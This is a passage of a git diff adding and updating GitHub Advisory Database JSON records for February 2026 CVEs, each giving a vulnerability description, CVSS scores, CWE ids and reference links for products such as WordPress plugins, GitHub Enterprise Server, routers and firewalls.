"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13842" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/breadcrumb-navxt/trunk/includes/blocks/build/breadcrumb-trail/render.php#L17" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3425008" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/62e25985-ac19-41a5-8027-eb053f4a6490?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qrj7-4954-7p6v/GHSA-qrj7-4954-7p6v.json b/advisories/unreviewed/2026/02/GHSA-qrj7-4954-7p6v/GHSA-qrj7-4954-7p6v.json new file mode 100644 index 0000000000000..a9069aad439a0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qrj7-4954-7p6v/GHSA-qrj7-4954-7p6v.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qrj7-4954-7p6v", + "modified": "2026-02-20T00:31:52Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-1999" + ], + "details": "An incorrect authorization vulnerability was identified in GitHub Enterprise Server that allowed an attacker to merge their own pull request into a repository without having push access by exploiting an authorization bypass in the enable_auto_merge mutation for pull requests. This issue only affected repositories that allow forking as the attack relies on opening a pull request from an attacker-controlled fork into the target repository. Exploitation was only possible in specific scenarios. It required a clean pull request status and only applied to branches without branch protection rules enabled. This vulnerability affected GitHub Enterprise Server versions prior to 3.19.2, 3.18.5, and 3.17.11, and was fixed in versions 3.19.2, 3.18.5, and 3.17.11. This vulnerability was reported via the GitHub Bug Bounty program.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:L/SC:L/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1999" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.11" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.5" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qv9f-wvw4-25rj/GHSA-qv9f-wvw4-25rj.json b/advisories/unreviewed/2026/02/GHSA-qv9f-wvw4-25rj/GHSA-qv9f-wvw4-25rj.json new file mode 100644 index 0000000000000..01a9f5ad82d64 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qv9f-wvw4-25rj/GHSA-qv9f-wvw4-25rj.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qv9f-wvw4-25rj", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22371" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Gustavo gustavo allows PHP Local File Inclusion.This issue affects Gustavo: from n/a through <= 1.2.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22371" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/gustavo/vulnerability/wordpress-gustavo-theme-1-2-2-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qvc7-4wrw-mpgp/GHSA-qvc7-4wrw-mpgp.json b/advisories/unreviewed/2026/02/GHSA-qvc7-4wrw-mpgp/GHSA-qvc7-4wrw-mpgp.json new file mode 100644 index 0000000000000..d45661ae5dd5e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qvc7-4wrw-mpgp/GHSA-qvc7-4wrw-mpgp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qvc7-4wrw-mpgp", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2023-38005" + ], + "details": "IBM Cloud Pak System 2.3.3.6, 2.3.3.7, 2.3.4.0, 2.3.4.1, and 2.3.5.0 could allow an authenticated user to perform unauthorized tasks due to improper access controls.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38005" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7259955" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T22:18:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qvhf-98cj-8779/GHSA-qvhf-98cj-8779.json b/advisories/unreviewed/2026/02/GHSA-qvhf-98cj-8779/GHSA-qvhf-98cj-8779.json new file mode 100644 index 0000000000000..85b9bfa417400 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qvhf-98cj-8779/GHSA-qvhf-98cj-8779.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qvhf-98cj-8779", + "modified": "2026-02-20T15:31:00Z", + "published": "2026-02-17T21:31:13Z", + "aliases": [ + "CVE-2026-26731" + ], + "details": "TOTOLINK A3002RU V2.1.1-B20211108.1455 was discovered to contain a stack-based buffer overflow via the routernamer`parameter in the formDnsv6 function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26731" + }, + { + "type": "WEB", + "url": "https://github.com/0xmania/cve/tree/main/TOTOLINK-A3002RU-boa-formDnsv6-StackOverflow" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T19:21:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qvpj-hxx2-jj7g/GHSA-qvpj-hxx2-jj7g.json b/advisories/unreviewed/2026/02/GHSA-qvpj-hxx2-jj7g/GHSA-qvpj-hxx2-jj7g.json new file mode 100644 index 0000000000000..e4fb96b475bdb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qvpj-hxx2-jj7g/GHSA-qvpj-hxx2-jj7g.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qvpj-hxx2-jj7g", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2025-53217" + ], + "details": "Missing Authorization vulnerability in staviravn AIO WP Builder all-in-one-wp-builder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects AIO WP Builder: from n/a through <= 2.0.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53217" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/all-in-one-wp-builder/vulnerability/wordpress-aio-wp-builder-plugin-2-0-2-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qw9p-rfpx-fxh5/GHSA-qw9p-rfpx-fxh5.json b/advisories/unreviewed/2026/02/GHSA-qw9p-rfpx-fxh5/GHSA-qw9p-rfpx-fxh5.json new file mode 100644 index 0000000000000..465c984583a48 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qw9p-rfpx-fxh5/GHSA-qw9p-rfpx-fxh5.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qw9p-rfpx-fxh5", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2025-12075" + ], + "details": "The Order Splitter for WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'wos_troubleshooting' AJAX endpoint in all versions up to, and including, 5.3.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view information pertaining to other user's orders.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12075" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3387820%40woo-order-splitter&new=3387820%40woo-order-splitter&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/627eb000-086e-408a-8123-063fed6364be?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qwww-xqmh-8p6x/GHSA-qwww-xqmh-8p6x.json b/advisories/unreviewed/2026/02/GHSA-qwww-xqmh-8p6x/GHSA-qwww-xqmh-8p6x.json new file mode 100644 index 0000000000000..2dbcea80f7b8f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qwww-xqmh-8p6x/GHSA-qwww-xqmh-8p6x.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qwww-xqmh-8p6x", + "modified": "2026-02-19T15:30:34Z", + "published": "2026-02-19T15:30:34Z", + "aliases": [ + "CVE-2019-25403" + ], + "details": "Comodo Dome Firewall 2.7.0 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by submitting crafted input to the comment parameter. Attackers can inject JavaScript code through the admin_profiles endpoint that executes in the browsers of other users who view the affected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25403" + }, + { + "type": "WEB", + "url": "https://cdome.comodo.com/firewall" + }, + { + "type": "WEB", + "url": "https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46408" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/comodo-dome-firewall-stored-cross-site-scripting-via-adminprofiles" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T13:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qx29-45jr-5q3q/GHSA-qx29-45jr-5q3q.json b/advisories/unreviewed/2026/02/GHSA-qx29-45jr-5q3q/GHSA-qx29-45jr-5q3q.json new file mode 100644 index 0000000000000..54557406e460d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qx29-45jr-5q3q/GHSA-qx29-45jr-5q3q.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qx29-45jr-5q3q", + "modified": "2026-02-19T18:31:50Z", + "published": "2026-02-19T18:31:50Z", + "aliases": [ + "CVE-2025-14851" + ], + "details": "The YaMaps for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `yamap` shortcode parameters in all versions up to, and including, 0.6.40 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14851" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/yamaps/tags/0.6.40/includes/shortcodes.php#L194" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/yamaps/tags/0.6.40/includes/shortcodes.php#L195" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3440575%40yamaps&new=3440575%40yamaps&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b0b84c2a-7297-4d96-8fa7-638b2b9953f4?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qx2f-v62g-3w7p/GHSA-qx2f-v62g-3w7p.json b/advisories/unreviewed/2026/02/GHSA-qx2f-v62g-3w7p/GHSA-qx2f-v62g-3w7p.json new file mode 100644 index 0000000000000..73037924495cd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qx2f-v62g-3w7p/GHSA-qx2f-v62g-3w7p.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qx2f-v62g-3w7p", + "modified": "2026-02-19T15:30:35Z", + "published": "2026-02-19T15:30:35Z", + "aliases": [ + "CVE-2019-25423" + ], + "details": "Comodo Dome Firewall 2.7.0 contains multiple reflected cross-site scripting vulnerabilities in the /korugan/proxyconfig endpoint that allow attackers to inject malicious scripts through POST parameters. Attackers can submit crafted POST requests with JavaScript payloads in parameters like PROXY_PORT, VISIBLE_HOSTNAME, ADMIN_MAIL_ADDRESS, CACHE_MEM, MAX_SIZE, MIN_SIZE, and DST_NOCACHE to execute arbitrary scripts in administrator browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25423" + }, + { + "type": "WEB", + "url": "https://cdome.comodo.com/firewall" + }, + { + "type": "WEB", + "url": "https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46408" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/comodo-dome-firewall-cross-site-scripting-via-proxyconfig" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T13:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qx68-hf7m-xmfg/GHSA-qx68-hf7m-xmfg.json b/advisories/unreviewed/2026/02/GHSA-qx68-hf7m-xmfg/GHSA-qx68-hf7m-xmfg.json new file mode 100644 index 0000000000000..5ab6900916702 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qx68-hf7m-xmfg/GHSA-qx68-hf7m-xmfg.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qx68-hf7m-xmfg", + "modified": "2026-02-19T00:30:29Z", + "published": "2026-02-19T00:30:29Z", + "aliases": [ + "CVE-2019-25397" + ], + "details": "IPFire 2.21 Core Update 127 contains multiple reflected cross-site scripting vulnerabilities in the hosts.cgi script that allow attackers to inject malicious scripts through unvalidated parameters. Attackers can submit POST requests with script payloads in the KEY1, IP, HOST, or DOM parameters to execute arbitrary JavaScript in users' browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25397" + }, + { + "type": "WEB", + "url": "https://downloads.ipfire.org/releases/ipfire-2.x/2.21-core127/ipfire-2.21.x86_64-full-core127.iso" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46344" + }, + { + "type": "WEB", + "url": "https://www.ipfire.org" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/ipfire-core-update-cross-site-scripting-via-hostsc" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T22:16:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qx85-r5h6-jm6f/GHSA-qx85-r5h6-jm6f.json b/advisories/unreviewed/2026/02/GHSA-qx85-r5h6-jm6f/GHSA-qx85-r5h6-jm6f.json new file mode 100644 index 0000000000000..07b6e5396aba9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qx85-r5h6-jm6f/GHSA-qx85-r5h6-jm6f.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qx85-r5h6-jm6f", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68025" + ], + "details": "Missing Authorization vulnerability in Addonify Addonify Floating Cart For WooCommerce addonify-floating-cart allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Addonify Floating Cart For WooCommerce: from n/a through <= 1.2.17.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68025" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/addonify-floating-cart/vulnerability/wordpress-addonify-floating-cart-for-woocommerce-plugin-1-2-17-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qx92-pw43-vf25/GHSA-qx92-pw43-vf25.json b/advisories/unreviewed/2026/02/GHSA-qx92-pw43-vf25/GHSA-qx92-pw43-vf25.json new file mode 100644 index 0000000000000..a609137b0d4cf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qx92-pw43-vf25/GHSA-qx92-pw43-vf25.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qx92-pw43-vf25", + "modified": "2026-02-22T15:30:15Z", + "published": "2026-02-22T15:30:15Z", + "aliases": [ + "CVE-2019-25457" + ], + "details": "Web Ofisi Firma v13 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'oz' array parameter. Attackers can send GET requests to category pages with malicious 'oz[]' values using time-based blind SQL injection payloads to extract sensitive database information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25457" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47145" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/web-ofisi-firma-sql-injection-via-oz-parameter" + }, + { + "type": "WEB", + "url": "https://www.web-ofisi.com/detay/kurumsal-firma-v13-sinirsiz-dil.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T15:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qxf4-rqx4-9mqj/GHSA-qxf4-rqx4-9mqj.json b/advisories/unreviewed/2026/02/GHSA-qxf4-rqx4-9mqj/GHSA-qxf4-rqx4-9mqj.json index 7a095742f0820..48a6c66996eda 100644 --- a/advisories/unreviewed/2026/02/GHSA-qxf4-rqx4-9mqj/GHSA-qxf4-rqx4-9mqj.json +++ b/advisories/unreviewed/2026/02/GHSA-qxf4-rqx4-9mqj/GHSA-qxf4-rqx4-9mqj.json @@ -42,6 +42,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-352", "CWE-640" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2026/02/GHSA-qxp9-w6x3-f25v/GHSA-qxp9-w6x3-f25v.json b/advisories/unreviewed/2026/02/GHSA-qxp9-w6x3-f25v/GHSA-qxp9-w6x3-f25v.json index 4f85327475fc1..eaa933b28c760 100644 --- a/advisories/unreviewed/2026/02/GHSA-qxp9-w6x3-f25v/GHSA-qxp9-w6x3-f25v.json +++ b/advisories/unreviewed/2026/02/GHSA-qxp9-w6x3-f25v/GHSA-qxp9-w6x3-f25v.json @@ -50,7 +50,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-qxv5-rwp8-8gff/GHSA-qxv5-rwp8-8gff.json b/advisories/unreviewed/2026/02/GHSA-qxv5-rwp8-8gff/GHSA-qxv5-rwp8-8gff.json new file mode 100644 index 0000000000000..937cbd4f273a7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qxv5-rwp8-8gff/GHSA-qxv5-rwp8-8gff.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qxv5-rwp8-8gff", + "modified": "2026-02-19T21:30:46Z", + "published": "2026-02-19T18:31:55Z", + "aliases": [ + "CVE-2026-23605" + ], + "details": "GFI MailEssentials AI versions prior to 22.4 contain a stored cross-site scripting vulnerability in the Attachment Filtering rule creation workflow. An authenticated user can supply HTML/JavaScript in the ctl00$ContentPlaceHolder1$pv1$TXB_RuleName parameter to /MailEssentials/pages/MailSecurity/attachmentchecking.aspx, which is stored and later rendered in the management interface, allowing script execution in the context of a logged-in user.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23605" + }, + { + "type": "WEB", + "url": "https://gfi.ai/products-and-solutions/network-security-solutions/mailessentials/resources/documentation/product-releases" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gfi-mailessentials-ai-attachment-filtering-rule-stored-xss" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T18:24:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r264-whc7-wwfw/GHSA-r264-whc7-wwfw.json b/advisories/unreviewed/2026/02/GHSA-r264-whc7-wwfw/GHSA-r264-whc7-wwfw.json new file mode 100644 index 0000000000000..7f5cad051600a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r264-whc7-wwfw/GHSA-r264-whc7-wwfw.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r264-whc7-wwfw", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-71226" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: iwlwifi: Implement settime64 as stub for MVM/MLD PTP\n\nSince commit dfb073d32cac (\"ptp: Return -EINVAL on ptp_clock_register if\nrequired ops are NULL\"), PTP clock registered through ptp_clock_register\nis required to have ptp_clock_info.settime64 set, however, neither MVM\nnor MLD's PTP clock implementation sets it, resulting in warnings when\nthe interface starts up, like\n\nWARNING: drivers/ptp/ptp_clock.c:325 at ptp_clock_register+0x2c8/0x6b8, CPU#1: wpa_supplicant/469\nCPU: 1 UID: 0 PID: 469 Comm: wpa_supplicant Not tainted 6.18.0+ #101 PREEMPT(full)\nra: ffff800002732cd4 iwl_mvm_ptp_init+0x114/0x188 [iwlmvm]\nERA: 9000000002fdc468 ptp_clock_register+0x2c8/0x6b8\niwlwifi 0000:01:00.0: Failed to register PHC clock (-22)\n\nI don't find an appropriate firmware interface to implement settime64()\nfor iwlwifi MLD/MVM, thus instead create a stub that returns\n-EOPTNOTSUPP only, suppressing the warning and allowing the PTP clock to\nbe registered.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71226" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/81d90d93d22ca4f61833cba921dce9a0bd82218f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ff6892ea544c4052dd5799f675ebc20419953801" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r29v-5x2x-xjh8/GHSA-r29v-5x2x-xjh8.json b/advisories/unreviewed/2026/02/GHSA-r29v-5x2x-xjh8/GHSA-r29v-5x2x-xjh8.json new file mode 100644 index 0000000000000..50b17215dd464 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r29v-5x2x-xjh8/GHSA-r29v-5x2x-xjh8.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r29v-5x2x-xjh8", + "modified": "2026-02-19T00:30:28Z", + "published": "2026-02-19T00:30:28Z", + "aliases": [ + "CVE-2019-25350" + ], + "details": "XMedia Recode 3.4.8.6 contains a denial of service vulnerability that allows attackers to crash the application by loading a specially crafted .m3u playlist file. Attackers can create a malicious .m3u file with an oversized buffer to trigger an application crash when the file is opened.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": 